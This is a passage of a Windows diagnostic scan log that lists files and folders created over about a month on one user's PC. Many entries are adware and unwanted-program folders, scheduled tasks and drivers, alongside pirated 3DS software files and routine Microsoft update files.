2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00E46BC8
2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000016C33528488
2016-10-14 17:54 - 2016-10-14 17:54 - 00000000 ____D C:\Program Files (x86)\InterHop
2016-10-14 17:53 - 2016-10-14 17:54 - 00000000 ____D C:\Program Files (x86)\rpi9tiy4
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0098AB70
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001F63CD29028
2016-10-09 13:06 - 2016-10-09 13:06 - 00436224 _____ (GmbH) C:\WINDOWS\system32\bi3.exe
2016-10-09 08:02 - 2016-10-09 08:02 - 00000000 ____D C:\WINDOWS\system32\owew
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow033F8D50
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000010ED7324178
2016-10-09 07:59 - 2016-10-09 07:59 - 00027456 _____ C:\WINDOWS\system32\Drivers\bsdpf64.sys
2016-10-09 07:59 - 2016-10-09 07:59 - 00026944 _____ C:\WINDOWS\system32\Drivers\bsdpr64.sys
2016-10-09 07:59 - 2016-10-09 07:59 - 00008948 _____ C:\WINDOWS\System32\Tasks\Anezotionprodily Verfier
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Geunfy
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\Company
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Local\Tempfolder
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\uninst
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-5e85-1
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-1fb5-0
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Program Files\YhidUn
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Program Files\Yhid
2016-10-09 07:58 - 2016-10-14 17:53 - 00000000 ____D C:\Program Files (x86)\Memucoojick
2016-10-09 07:58 - 2016-10-09 07:58 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Herzaentreernos
2016-10-09 07:58 - 2016-10-09 07:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Cleqiryvovaght
2016-10-09 07:53 - 2016-10-17 13:24 - 00000427 _____ C:\WINDOWS\SysWOW64\data
2016-10-09 07:48 - 2016-10-17 13:14 - 00000000 ____D C:\Users\maikp\AppData\Local\DailyBee
2016-10-09 07:48 - 2016-10-12 15:46 - 00440832 _____ C:\ProgramData\smp2.exe
2016-10-09 07:48 - 2016-10-09 07:48 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-10-09 07:48 - 2016-10-09 07:48 - 00004422 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c
2016-10-09 07:48 - 2016-10-09 07:48 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\ProgramData\SearchModule
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 ____D C:\ProgramData\Microleaves
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 _____ C:\WINDOWS\system32\㌠瀴Ť__00007FF6FAFCA32A__C0000005.dmp
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Local\Phatek
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Program Files (x86)\Priuhgily
2016-10-08 21:00 - 2016-10-09 08:00 - 00000000 ____D C:\Program Files (x86)\DPower
2016-10-08 21:00 - 2016-10-09 07:46 - 00000000 ____D C:\Program Files (x86)\sunnyday
2016-10-08 21:00 - 2016-10-08 21:01 - 00000000 ____D C:\Users\Public\Thunder Network
2016-10-08 21:00 - 2016-10-08 21:00 - 00008996 _____ C:\WINDOWS\System32\Tasks\Jizergh Launcher
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____T C:\WINDOWS\system32\mfs379.tmp
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\Users\maikp\AppData\Local\tuto_monetize_120161008
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\ProgramData\Thunder Network
2016-10-08 20:59 - 2016-10-17 13:13 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\System32\Tasks\Y2Go
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\system32\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\HDWallPaper
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files\Caster
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2GoUpdater
2016-10-08 20:58 - 2016-10-17 13:12 - 00000000 ____D C:\Users\maikp\AppData\Local\Apps\2.0
2016-10-08 20:58 - 2016-10-14 18:04 - 00000000 ____D C:\Program Files (x86)\OtherSearch
2016-10-08 20:58 - 2016-10-09 07:47 - 00000000 ____D C:\Program Files (x86)\mpck
2016-10-08 20:58 - 2016-10-08 21:00 - 00000000 ____D C:\Program Files\SpaceSoundPro
2016-10-08 20:58 - 2016-10-08 20:59 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Local\03AA02FC-1475960308-05C3-7606-B70700080009
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2Go
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Ferqesp
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Clumick
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Ulighthazertion
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-10-08 20:57 - 2016-10-08 20:57 - 00004164 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Update Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00003394 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Launch Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Users\maikp\AppData\Local\WebDiscoverBrowser
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Program Files\WebDiscoverBrowser
2016-10-08 20:55 - 2016-10-17 12:25 - 00000000 ____D C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009
2016-10-08 20:55 - 2016-10-14 18:54 - 00000000 ____D C:\Program Files (x86)\WebShield
2016-10-08 20:55 - 2016-10-08 20:55 - 00003766 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2016-10-08 20:55 - 2016-10-08 20:55 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2016-10-08 20:55 - 2016-10-08 20:55 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2016-10-08 20:55 - 2016-10-08 20:55 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Users\maikp\AppData\Roaming\YSPackage
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YSPackage
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Program Files (x86)\Microleaves
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 _____ C:\TOSTACK
2016-10-08 20:54 - 2016-10-17 13:14 - 00000000 ____D C:\Users\maikp\AppData\Local\AppTrailers
2016-10-08 20:53 - 2016-10-08 20:56 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microleaves
2016-10-08 20:53 - 2016-10-08 20:53 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppTrailers
2016-10-08 20:53 - 2016-10-08 20:53 - 00000000 ____D C:\Users\maikp\AppData\Roaming\AppTrailers
2016-10-08 20:52 - 2016-10-17 13:15 - 00000000 ____D C:\ProgramData\Quoteex
2016-10-08 20:52 - 2016-10-17 13:14 - 00002378 _____ C:\WINDOWS\SysWOW64\findit.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 07176704 _____ C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 01928315 _____ C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 01897576 _____ C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00190394 _____ C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00140288 _____ C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00126464 _____ C:\Users\maikp\AppData\Roaming\noah.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00070704 _____ C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00018432 _____ C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00015792 _____ C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00005568 _____ C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Quoteexs
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Social2Se Browser Enhancer
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Logic Handler
2016-10-08 20:52 - 2016-10-08 20:51 - 00693760 _____ C:\Users\maikp\AppData\Roaming\KeyApphase.exe
2016-10-08 20:51 - 2016-10-14 18:03 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-10-08 20:51 - 2016-10-09 07:43 - 00000000 ____D C:\Program Files\ad11222373fdc03dd874a65a6c6001bc
2016-10-07 16:44 - 2016-10-07 16:44 - 00000000 ___RD C:\Users\maikp\Downloads\BallardAppCraftery.CraftyFileViewer_epyrqhfctk40t!App
2016-10-06 19:57 - 2016-10-14 20:10 - 00000000 ____D C:\Users\maikp\Desktop\Nintendo 3DS
2016-10-06 19:54 - 2016-10-06 19:54 - 00115504 _____ C:\Users\maikp\OneDrive\Documents\encTitleKeys.bin
2016-10-06 19:53 - 2016-10-06 19:53 - 03699648 _____ C:\Users\maikp\OneDrive\Documents\freeShop-2.1.1.cia
2016-10-06 19:53 - 2016-10-06 19:53 - 03056576 _____ C:\Users\maikp\OneDrive\Documents\freeShop-1.2.2.cia
2016-10-06 19:52 - 2016-10-06 19:52 - 03220416 _____ C:\Users\maikp\Downloads\freeShop-2.1.3.cia
2016-10-06 18:51 - 2016-10-06 18:51 - 02009269 _____ C:\WINDOWS\6819e3abef567df1f1330af4ff9ec057.exe
2016-10-06 18:42 - 2016-10-06 18:42 - 00057424 _____ (K5ON85) C:\WINDOWS\system32\Drivers\850f7be33916569bd078ba09b46b7e7d.sys
2016-10-05 16:36 - 2016-10-05 16:40 - 00000951 _____ C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job
2016-10-05 16:36 - 2016-10-05 16:36 - 00004148 _____ C:\WINDOWS\System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}
2016-10-05 16:36 - 2016-10-05 16:36 - 00001014 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files\Common Files\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\epson
2016-10-05 16:36 - 2014-06-03 00:00 - 00472064 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\esxw2ud.dll
2016-10-05 16:36 - 2012-05-17 00:00 - 00144560 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\escsvc64.exe
2016-10-05 16:34 - 2014-03-04 21:06 - 00180224 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YLMBPME.DLL
2016-10-05 16:34 - 2011-03-14 20:03 - 00083968 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YD4BPME.DLL
2016-10-05 16:33 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Epson
2016-10-05 16:30 - 2016-10-05 16:30 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-10-03 12:02 - 2016-10-14 17:57 - 00000000 ____D C:\Users\maikp\AppData\Local\MEGAsync
2016-10-03 12:02 - 2016-10-03 12:02 - 00000000 ____D C:\Users\maikp\AppData\Local\Mega Limited
2016-10-03 11:56 - 2016-10-03 12:01 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup(1).exe
2016-10-03 11:52 - 2016-10-03 12:02 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup.exe
2016-10-03 11:40 - 2016-10-17 13:19 - 00001431 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-17 13:19 - 00001419 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-03 11:48 - 00000000 ____D C:\Users\maikp\AppData\Local\Mozilla
2016-10-03 11:40 - 2016-10-03 11:41 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Mozilla
2016-10-03 11:40 - 2016-10-03 11:40 - 00243744 _____ C:\Users\maikp\Downloads\Firefox Setup Stub 49.0.1.exe
2016-10-03 11:40 - 2016-10-03 11:40 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-02 20:49 - 2016-10-03 12:01 - 00000000 ___RD C:\Users\maikp\OneDrive\Documents\Scanned Documents
2016-10-02 20:49 - 2016-10-02 20:49 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Fax
2016-10-02 18:39 - 2016-10-02 18:40 - 375232764 _____ (Adobe Systems Inc. ) C:\Users\maikp\Downloads\PS_CS2_Gr_NonRet.exe
2016-10-02 18:18 - 2016-10-02 18:18 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst (1).exe
2016-10-02 18:12 - 2016-10-02 18:12 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst.exe
2016-09-30 06:32 - 2016-09-15 19:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2016-09-30 06:32 - 2016-09-15 19:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-09-30 06:32 - 2016-09-15 19:34 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-09-30 06:32 - 2016-09-15 19:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll
2016-09-30 06:32 - 2016-09-15 19:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-09-30 06:32 - 2016-09-15 19:28 - 07812960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-09-30 06:32 - 2016-09-15 19:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-09-30 06:32 - 2016-09-15 19:23 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01980776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-09-30 06:32 - 2016-09-15 19:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-09-30 06:32 - 2016-09-15 19:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-09-30 06:32 - 2016-09-15 19:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-09-30 06:32 - 2016-09-15 19:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-09-30 06:32 - 2016-09-15 19:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2016-09-30 06:32 - 2016-09-15 19:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-09-30 06:32 - 2016-09-15 19:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-09-30 06:32 - 2016-09-15 19:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2016-09-30 06:32 - 2016-09-15 19:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll
2016-09-30 06:32 - 2016-09-15 19:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-09-30 06:32 - 2016-09-15 18:58 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll
2016-09-30 06:32 - 2016-09-15 18:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2016-09-30 06:32 - 2016-09-15 18:53 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-09-30 06:32 - 2016-09-15 18:52 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-09-30 06:32 - 2016-09-15 18:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-09-30 06:32 - 2016-09-15 18:49 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-09-30 06:32 - 2016-09-15 18:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:44 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:43 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-09-30 06:32 - 2016-09-15 18:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-09-30 06:32 - 2016-09-15 18:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-09-30 06:32 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-09-30 06:32 - 2016-09-15 18:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-09-30 06:32 - 2016-09-15 18:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-09-30 06:32 - 2016-09-15 18:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-09-30 06:32 - 2016-09-15 18:25 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-09-30 06:32 - 2016-09-15 18:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-09-30 06:32 - 2016-09-15 18:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-09-30 06:31 - 2016-09-24 07:55 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-09-30 06:31 - 2016-09-24 07:46 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-09-30 06:31 - 2016-09-24 07:44 - 02264064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-09-30 06:31 - 2016-09-15 20:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-09-30 06:31 - 2016-09-15 19:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:30 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-09-30 06:31 - 2016-09-15 19:30 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-09-30 06:31 - 2016-09-15 19:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-09-30 06:31 - 2016-09-15 19:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-09-30 06:31 - 2016-09-15 19:28 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:28 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-09-30 06:31 - 2016-09-15 19:28 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-09-30 06:31 - 2016-09-15 19:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-09-30 06:31 - 2016-09-15 19:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-09-30 06:31 - 2016-09-15 19:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
